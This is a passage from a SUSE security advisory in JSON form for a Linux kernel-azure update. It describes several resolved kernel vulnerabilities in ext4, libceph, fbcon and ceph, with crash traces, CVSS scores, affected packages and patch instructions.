"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: add i_data_sem protection in ext4_destroy_inline_data_nolock()\n\nFix a race between inline data destruction and block mapping.\n\nThe function ext4_destroy_inline_data_nolock() changes the inode data\nlayout by clearing EXT4_INODE_INLINE_DATA and setting EXT4_INODE_EXTENTS.\nAt the same time, another thread may execute ext4_map_blocks(), which\ntests EXT4_INODE_EXTENTS to decide whether to call ext4_ext_map_blocks()\nor ext4_ind_map_blocks().\n\nWithout i_data_sem protection, ext4_ind_map_blocks() may receive inode\nwith EXT4_INODE_EXTENTS flag and triggering assert.\n\nkernel BUG at fs/ext4/indirect.c:546!\nEXT4-fs (loop2): unmounting filesystem.\ninvalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014\nRIP: 0010:ext4_ind_map_blocks.cold+0x2b/0x5a fs/ext4/indirect.c:546\n\nCall Trace:\n \u003cTASK\u003e\n ext4_map_blocks+0xb9b/0x16f0 fs/ext4/inode.c:681\n _ext4_get_block+0x242/0x590 fs/ext4/inode.c:822\n ext4_block_write_begin+0x48b/0x12c0 fs/ext4/inode.c:1124\n ext4_write_begin+0x598/0xef0 fs/ext4/inode.c:1255\n ext4_da_write_begin+0x21e/0x9c0 fs/ext4/inode.c:3000\n generic_perform_write+0x259/0x5d0 mm/filemap.c:3846\n ext4_buffered_write_iter+0x15b/0x470 fs/ext4/file.c:285\n ext4_file_write_iter+0x8e0/0x17f0 fs/ext4/file.c:679\n call_write_iter include/linux/fs.h:2271 [inline]\n do_iter_readv_writev+0x212/0x3c0 fs/read_write.c:735\n do_iter_write+0x186/0x710 fs/read_write.c:861\n vfs_iter_write+0x70/0xa0 fs/read_write.c:902\n iter_file_splice_write+0x73b/0xc90 fs/splice.c:685\n do_splice_from fs/splice.c:763 [inline]\n direct_splice_actor+0x10f/0x170 fs/splice.c:950\n splice_direct_to_actor+0x33a/0xa10 fs/splice.c:896\n do_splice_direct+0x1a9/0x280 fs/splice.c:1002\n do_sendfile+0xb13/0x12c0 fs/read_write.c:1255\n __do_sys_sendfile64 fs/read_write.c:1323 [inline]\n __se_sys_sendfile64 fs/read_write.c:1309 [inline]\n __x64_sys_sendfile64+0x1cf/0x210 fs/read_write.c:1309\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81\n entry_SYSCALL_64_after_hwframe+0x6e/0xd8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68261",
"url": "https://www.suse.com/security/cve/CVE-2025-68261"
},
{
"category": "external",
"summary": "SUSE Bug 1255164 for CVE-2025-68261",
"url": "https://bugzilla.suse.com/1255164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68261"
},
{
"cve": "CVE-2025-68284",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68284"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: prevent potential out-of-bounds writes in handle_auth_session_key()\n\nThe len field originates from untrusted network packets. Boundary\nchecks have been added to prevent potential out-of-bounds writes when\ndecrypting the connection secret or processing service tickets.\n\n[ idryomov: changelog ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68284",
"url": "https://www.suse.com/security/cve/CVE-2025-68284"
},
{
"category": "external",
"summary": "SUSE Bug 1255377 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255377"
},
{
"category": "external",
"summary": "SUSE Bug 1255378 for CVE-2025-68284",
"url": "https://bugzilla.suse.com/1255378"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "important"
}
],
"title": "CVE-2025-68285"
},
{
"cve": "CVE-2025-68296",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68296"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup\n\nProtect vga_switcheroo_client_fb_set() with console lock. Avoids OOB\naccess in fbcon_remap_all(). Without holding the console lock the call\nraces with switching outputs.\n\nVGA switcheroo calls fbcon_remap_all() when switching clients. The fbcon\nfunction uses struct fb_info.node, which is set by register_framebuffer().\nAs the fb-helper code currently sets up VGA switcheroo before registering\nthe framebuffer, the value of node is -1 and therefore not a legal value.\nFor example, fbcon uses the value within set_con2fb_map() [1] as an index\ninto an array.\n\nMoving vga_switcheroo_client_fb_set() after register_framebuffer() can\nresult in VGA switching that does not switch fbcon correctly.\n\nTherefore move vga_switcheroo_client_fb_set() under fbcon_fb_registered(),\nwhich already holds the console lock. Fbdev calls fbcon_fb_registered()\nfrom within register_framebuffer(). Serializes the helper with VGA\nswitcheroo\u0027s call to fbcon_remap_all().\n\nAlthough vga_switcheroo_client_fb_set() takes an instance of struct fb_info\nas parameter, it really only needs the contained fbcon state. Moving the\ncall to fbcon initialization is therefore cleaner than before. Only amdgpu,\ni915, nouveau and radeon support vga_switcheroo. For all other drivers,\nthis change does nothing.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68296",
"url": "https://www.suse.com/security/cve/CVE-2025-68296"
},
{
"category": "external",
"summary": "SUSE Bug 1255128 for CVE-2025-68296",
"url": "https://bugzilla.suse.com/1255128"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-12T11:26:05Z",
"details": "moderate"
}
],
"title": "CVE-2025-68296"
},
{
"cve": "CVE-2025-68297",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68297"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix crash in process_v2_sparse_read() for encrypted directories\n\nThe crash in process_v2_sparse_read() for fscrypt-encrypted directories\nhas been reported. Issue takes place for Ceph msgr2 protocol in secure\nmode. It can be reproduced by the steps:\n\nsudo mount -t ceph :/ /mnt/cephfs/ -o name=admin,fs=cephfs,ms_mode=secure\n\n(1) mkdir /mnt/cephfs/fscrypt-test-3\n(2) cp area_decrypted.tar /mnt/cephfs/fscrypt-test-3\n(3) fscrypt encrypt --source=raw_key --key=./my.key /mnt/cephfs/fscrypt-test-3\n(4) fscrypt lock /mnt/cephfs/fscrypt-test-3\n(5) fscrypt unlock --key=my.key /mnt/cephfs/fscrypt-test-3\n(6) cat /mnt/cephfs/fscrypt-test-3/area_decrypted.tar\n(7) Issue has been triggered\n\n[ 408.072247] ------------[ cut here ]------------\n[ 408.072251] WARNING: CPU: 1 PID: 392 at net/ceph/messenger_v2.c:865\nceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072267] Modules linked in: intel_rapl_msr intel_rapl_common\nintel_uncore_frequency_common intel_pmc_core pmt_telemetry pmt_discovery\npmt_class intel_pmc_ssram_telemetry intel_vsec kvm_intel joydev kvm irqbypass\npolyval_clmulni ghash_clmulni_intel aesni_intel rapl input_leds psmouse\nserio_raw i2c_piix4 vga16fb bochs vgastate i2c_smbus floppy mac_hid qemu_fw_cfg\npata_acpi sch_fq_codel rbd msr parport_pc ppdev lp parport efi_pstore\n[ 408.072304] CPU: 1 UID: 0 PID: 392 Comm: kworker/1:3 Not tainted 6.17.0-rc7+\n[ 408.072307] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.17.0-5.fc42 04/01/2014\n[ 408.072310] Workqueue: ceph-msgr ceph_con_workfn\n[ 408.072314] RIP: 0010:ceph_con_v2_try_read+0x4b39/0x72f0\n[ 408.072317] Code: c7 c1 20 f0 d4 ae 50 31 d2 48 c7 c6 60 27 d5 ae 48 c7 c7 f8\n8e 6f b0 68 60 38 d5 ae e8 00 47 61 fe 48 83 c4 18 e9 ac fc ff ff \u003c0f\u003e 0b e9 06\nfe ff ff 4c 8b 9d 98 fd ff ff 0f 84 64 e7 ff ff 89 85\n[ 408.072319] RSP: 0018:ffff88811c3e7a30 EFLAGS: 00010246\n[ 408.072322] RAX: ffffed1024874c6f RBX: ffffea00042c2b40 RCX: 0000000000000f38\n[ 408.072324] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 408.072325] RBP: ffff88811c3e7ca8 R08: 0000000000000000 R09: 00000000000000c8\n[ 408.072326] R10: 00000000000000c8 R11: 0000000000000000 R12: 00000000000000c8\n[ 408.072327] R13: dffffc0000000000 R14: ffff8881243a6030 R15: 0000000000003000\n[ 408.072329] FS: 0000000000000000(0000) GS:ffff88823eadf000(0000)\nknlGS:0000000000000000\n[ 408.072331] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 408.072332] CR2: 000000c0003c6000 CR3: 000000010c106005 CR4: 0000000000772ef0\n[ 408.072336] PKRU: 55555554\n[ 408.072337] Call Trace:\n[ 408.072338] \u003cTASK\u003e\n[ 408.072340] ? sched_clock_noinstr+0x9/0x10\n[ 408.072344] ? __pfx_ceph_con_v2_try_read+0x10/0x10\n[ 408.072347] ? _raw_spin_unlock+0xe/0x40\n[ 408.072349] ? finish_task_switch.isra.0+0x15d/0x830\n[ 408.072353] ? __kasan_check_write+0x14/0x30\n[ 408.072357] ? mutex_lock+0x84/0xe0\n[ 408.072359] ? __pfx_mutex_lock+0x10/0x10\n[ 408.072361] ceph_con_workfn+0x27e/0x10e0\n[ 408.072364] ? metric_delayed_work+0x311/0x2c50\n[ 408.072367] process_one_work+0x611/0xe20\n[ 408.072371] ? __kasan_check_write+0x14/0x30\n[ 408.072373] worker_thread+0x7e3/0x1580\n[ 408.072375] ? __pfx__raw_spin_lock_irqsave+0x10/0x10\n[ 408.072378] ? __pfx_worker_thread+0x10/0x10\n[ 408.072381] kthread+0x381/0x7a0\n[ 408.072383] ? __pfx__raw_spin_lock_irq+0x10/0x10\n[ 408.072385] ? __pfx_kthread+0x10/0x10\n[ 408.072387] ? __kasan_check_write+0x14/0x30\n[ 408.072389] ? recalc_sigpending+0x160/0x220\n[ 408.072392] ? _raw_spin_unlock_irq+0xe/0x50\n[ 408.072394] ? calculate_sigpending+0x78/0xb0\n[ 408.072395] ? __pfx_kthread+0x10/0x10\n[ 408.072397] ret_from_fork+0x2b6/0x380\n[ 408.072400] ? __pfx_kthread+0x10/0x10\n[ 408.072402] ret_from_fork_asm+0x1a/0x30\n[ 408.072406] \u003c/TASK\u003e\n[ 408.072407] ---[ end trace 0000000000000000 ]---\n[ 408.072418] Oops: general protection fault, probably for non-canonical\naddress 0xdffffc00000000\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-syms-azure-6.4.0-150700.20.27.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68297",
"url": "https://www.suse.com/security/cve/CVE-2025-68297"
},
{
"category": "external",
"summary": "SUSE Bug 1255403 for CVE-2025-68297",
"url": "https://bugzilla.suse.com/1255403"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.aarch64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-azure-devel-6.4.0-150700.20.27.1.x86_64",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-devel-azure-6.4.0-150700.20.27.1.noarch",
"SUSE Linux Enterprise Module for Public Cloud 15 SP7:kernel-source-azure-6.4.0-150700.20.27.1.noarch",
